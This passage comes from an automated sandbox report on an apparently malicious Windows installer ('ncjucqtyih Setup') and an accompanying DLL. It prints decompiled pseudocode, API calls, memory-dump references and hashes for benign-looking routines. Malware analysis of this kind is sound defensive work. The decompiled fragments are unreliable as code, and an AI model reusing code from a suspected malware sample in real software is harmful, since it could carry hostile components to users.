				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                        0x0040464f
                        0x00404654
                        0x0040465c
                        0x0040465d
                        0x0040466a
                        0x00404672
                        0x00404673
                        0x00404675
                        0x00404677
                        0x00404679
                        0x0040467c
                        0x0040467c
                        0x00404683
                        0x00404689
                        0x00404689
                        0x00404690
                        0x00404697
                        0x0040469a
                        0x0040469d
                        0x0040469d
                        0x004046a1
                        0x004046b1
                        0x004046b3
                        0x004046b6
                        0x0040465f
                        0x0040465f
                        0x00404666
                        0x00404666
                        0x004046be
                        0x004046c9
                        0x004046df
                        0x004046ef
                        0x0040470b

                        APIs
                        • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                        • wsprintfA.USER32 ref: 004046EF
                        • SetDlgItemTextA.USER32 ref: 00404702
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s
                        • API String ID: 3540041739-3551169577
                        • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                        • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                        • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                        • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10004150, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E10004150(void* __ebx, void* __edi, char* _a4) {
				signed int _v8;
				signed int _v12;
				char _v13;
				void* _v14;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				signed char _t50;
				char* _t54;
				char* _t71;
				char* _t76;
				signed int _t82;
				char** _t90;

				_v8 = 0;
				_v12 = 0;
				_t71 = _a4;
				_t92 =  *(_t71 + 0x18) & 0x0000000f;
				_t82 = 1;
				_v13 = 1;
				if(( *(_t71 + 0x18) & 0x0000000f) != 0) {
					 *_t90 = L"(dec->bit_pos & 0xF) == 0";
					_v28 = L"Source.c";
					_v24 = 0xaa;
					E10005297(__ebx, 1, __edi, _t92);
					_v13 = 0;
				}
				while(_a4[0x18] != 0) {
					_a4[0x18] = _a4[0x18] - 0x10;
					_v8 = (_a4[0x14] >> _a4[0x18] & 0x0000ffff) << _v12 | _v8;
					_v12 = _v12 + 0x10;
				}
				while(1) {
					__eflags = _v12 - 0x20;
					_v14 = 0;
					if(_v12 < 0x20) {
						_t54 = _a4;
						_t76 = _a4;
						__eflags =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8));
						_t32 =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8)) < 0;
						__eflags = _t32;
						_v14 = _t82 & 0xffffff00 | _t32;
					}
					_t50 = _v14;
					__eflags = _t50 & 0x00000001;
					if((_t50 & 0x00000001) == 0) {
						break;
					}
					 *_t90 = _a4;
					_v20 = E10004030() & 0x0000ffff;
					_v8 = _v20 << _v12 | _v8;
					_t82 = _v12 + 0x10;
					_v12 = _t82;
				}
				return _v8;
			}
















                        0x10004159
                        0x10004160
                        0x10004167
                        0x10004170
                        0x10004173
                        0x10004175
                        0x10004178
                        0x10004184
                        0x1000418d
                        0x10004191
                        0x10004199
                        0x100041a0
                        0x100041a0
                        0x100041a6
                        0x100041bc
                        0x100041da
                        0x100041e3
                        0x100041e3
                        0x100041f0
                        0x100041f2
                        0x100041f6
                        0x100041f9
                        0x100041ff
                        0x10004208
                        0x1000420b
                        0x1000420e
                        0x1000420e
                        0x10004211
                        0x10004211
                        0x10004214
                        0x10004217
                        0x10004219
                        0x00000000
                        0x00000000
                        0x10004227
                        0x10004235
                        0x10004242
                        0x10004248
                        0x1000424b
                        0x1000424b
                        0x1000425a

                        APIs
                        • __wassert.LIBCMT ref: 10004199
                          • Part of subcall function 10005297: GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000535C
                          • Part of subcall function 10005297: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 10005388
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Module$FileHandleName__wassert
                        • String ID: $(dec->bit_pos & 0xF) == 0$Source.c
                        • API String ID: 1832359313-2493867184
                        • Opcode ID: 5c08706582030b261e21bbc914382971aab491052d29c33789c90defc3be8190
                        • Instruction ID: 51f6379824fe9e4415b07059da216bb01802ed9ed433fbb833ff1512406a754a
                        • Opcode Fuzzy Hash: 5c08706582030b261e21bbc914382971aab491052d29c33789c90defc3be8190
                        • Instruction Fuzzy Hash: 14312B74A04248EFDB04DF98C090A9DBFF1EF54380F25849DE8899B346D731EA85DB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 51%
                        			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                        0x00401bd3
                        0x00401bdf
                        0x00401be2
                        0x00401beb
                        0x00401beb
                        0x00401bee
                        0x00401bf2
                        0x00401bfb
                        0x00401bfb
                        0x00401bfe
                        0x00401c02
                        0x00401c04
                        0x00401c51
                        0x00401c53
                        0x00401c5c
                        0x00401c64
                        0x00401c67
                        0x00401c67
                        0x00401c70
                        0x00000000
                        0x00401c06
                        0x00401c0d
                        0x00401c0f
                        0x00401c17
                        0x00401c1a
                        0x00401c42
                        0x00401c76
                        0x00401c76
                        0x00401c1c
                        0x00401c2a
                        0x00401c32
                        0x00401c35
                        0x00401c35
                        0x00401c1a
                        0x00401c79
                        0x00401c7c
                        0x00401c82
                        0x00402866
                        0x00402866
                        0x004028c1
                        0x004028cd

                        APIs
                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                        • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                        • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                        • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004038B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x571700
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "ncjucqtyih Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x3
						_t27 =  *0x423f68; // 0x5718ac
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x5718c4
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                        0x004038b8
                        0x004038bd
                        0x004038c3
                        0x004038c8
                        0x004038c8
                        0x004038d0
                        0x00000000
                        0x00000000
                        0x004038d2
                        0x004038d8
                        0x004038e0
                        0x004038e2
                        0x004038e8
                        0x004038e8
                        0x004038ea
                        0x004038f6
                        0x00000000
                        0x00000000
                        0x004038fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004038fc
                        0x00403901
                        0x0040390a
                        0x00403910
                        0x00403915
                        0x00403929
                        0x00403934
                        0x0040394c
                        0x00403952
                        0x00403957
                        0x0040395f
                        0x00403980
                        0x00403980
                        0x00403980
                        0x00403961
                        0x00403963
                        0x00403963
                        0x00403967
                        0x0040396a
                        0x0040396e
                        0x0040396e
                        0x00403973
                        0x00403979
                        0x00403979
                        0x00000000
                        0x00403963
                        0x00403917
                        0x0040391c
                        0x00403925
                        0x0040391e
                        0x0040391e
                        0x0040391e
                        0x0040391c

                        APIs
                        • SetWindowTextA.USER32(00000000,ncjucqtyih Setup), ref: 0040394C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: TextWindow
                        • String ID: "C:\Users\user\Desktop\aZOmps0Ug8.exe" $1033$ncjucqtyih Setup
                        • API String ID: 530164218-375433792
                        • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                        • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                        • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                        • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10008671, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 16%
                        			E10008671(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                        0x10008675
                        0x10008680
                        0x10008688
                        0x10008692
                        0x1000869a
                        0x00000000
                        0x1000869f
                        0x1000869a
                        0x100086a4

                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,10003D2C,?,?,10008666,?,?,10009F8C,000000FF,0000001E,10019408,00000008,10009F2F,?,?), ref: 10008680
                        • GetProcAddress.KERNEL32(10003D2C,CorExitProcess), ref: 10008692
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 1646373207-1276376045
                        • Opcode ID: 107f9a0968b76c1df5d284e61ae340f4194d2582b142d5d7be716b90798d810b
                        • Instruction ID: d7b0111e5ed9f90c60bb3e07c85a27e08a7ab00baf0db86fd472543e4325d8ff
                        • Opcode Fuzzy Hash: 107f9a0968b76c1df5d284e61ae340f4194d2582b142d5d7be716b90798d810b
                        • Instruction Fuzzy Hash: 3AD01730604208BBEF41DBA1CC89FA97BACEB05681F050164F909E5060DB32EB609B66
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                        0x0040568c
                        0x004056a3
                        0x004056ab
                        0x004056ab
                        0x004056b3

                        APIs
                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                        • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-3936084776
                        • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                        • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                        • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                        • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1000E2CE, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1000E2CE(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000A920(_t50,  &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000E10D( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E1000983A(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                        0x1000e2d6
                        0x1000e2db
                        0x1000e2f5
                        0x00000000
                        0x1000e2f5
                        0x1000e2dd
                        0x1000e2e2
                        0x00000000
                        0x00000000
                        0x1000e2e7
                        0x1000e304
                        0x1000e309
                        0x1000e30c
                        0x1000e313
                        0x1000e332
                        0x1000e339
                        0x1000e33b
                        0x1000e37f
                        0x1000e38e
                        0x1000e39c
                        0x1000e39e
                        0x1000e3ae
                        0x1000e3ae
                        0x1000e3b2
                        0x1000e3b4
                        0x1000e3b7
                        0x1000e3b7
                        0x1000e3b7
                        0x1000e3b7
                        0x00000000
                        0x1000e3bd
                        0x1000e3a0
                        0x1000e3a0
                        0x1000e3a5
                        0x1000e3a5
                        0x1000e3a8
                        0x00000000
                        0x1000e3a8
                        0x1000e33d
                        0x1000e340
                        0x1000e344
                        0x1000e36d
                        0x1000e36d
                        0x1000e370
                        0x1000e370
                        0x00000000
                        0x00000000
                        0x1000e372
                        0x1000e376
                        0x00000000
                        0x00000000
                        0x1000e378
                        0x1000e378
                        0x00000000
                        0x1000e378
                        0x1000e346
                        0x1000e349
                        0x00000000
                        0x00000000
                        0x1000e34d
                        0x1000e360
                        0x1000e366
                        0x1000e369
                        0x1000e36b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000e36b
                        0x1000e315
                        0x1000e318
                        0x1000e31a
                        0x1000e31f
                        0x1000e31f
                        0x1000e324
                        0x00000000
                        0x1000e324
                        0x1000e2e9
                        0x1000e2ee
                        0x1000e2f2
                        0x1000e2f2
                        0x00000000

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E304
                        • __isleadbyte_l.LIBCMT ref: 1000E332
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E360
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E396
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: a3801d347340d31d8301915e8298382d1c2cc82f16e83bedc4effff6694e28cd
                        • Instruction ID: efca565247f5b6505955f422bca2e20875cd9252e858f6577e9620fa67f6a312
                        • Opcode Fuzzy Hash: a3801d347340d31d8301915e8298382d1c2cc82f16e83bedc4effff6694e28cd
                        • Instruction Fuzzy Hash: B031C231604296AFEB11CE65C848BAA7FF9FF413D0F154128E4A4A7194D730EE90DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001065B, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1001065B(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E100109E4(_a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					if(_t25 != 0x66) {
						if(_t25 == 0x61 || _t25 == 0x41) {
							_t26 = E10010AB2(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							_t26 = E10010FBB(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
						}
						L9:
						return _t26;
					} else {
						return E10010EFA(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                        0x1001065e
                        0x10010664
                        0x100106d7
                        0x00000000
                        0x1001066b
                        0x1001066e
                        0x1001068c
                        0x100106be
                        0x10010693
                        0x100106a5
                        0x100106a5
                        0x100106dc
                        0x100106e0
                        0x10010670
                        0x10010688
                        0x10010688
                        0x1001066e

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                        • Instruction ID: 89a450d459da5a3812fef2ea964860e177c4d078e22bdd91ed20284a6ca40805
                        • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                        • Instruction Fuzzy Hash: A4014C7660018EBBCF12DE84CC028EE3F66FF48294B598415FEA859031D776D9B1AB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                        0x00401d46
                        0x00401d5f
                        0x00401d69
                        0x00401d6e
                        0x00401d79
                        0x00401d80
                        0x00401d92
                        0x00401d98
                        0x00401d9d
                        0x00401da7
                        0x004024eb
                        0x00401561
                        0x00402866
                        0x004028c1
                        0x004028cd

                        APIs
                        • GetDC.USER32(?), ref: 00401D3F
                        • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                        • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirect
                        • String ID:
                        • API String ID: 3272661963-0
                        • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                        • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                        • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
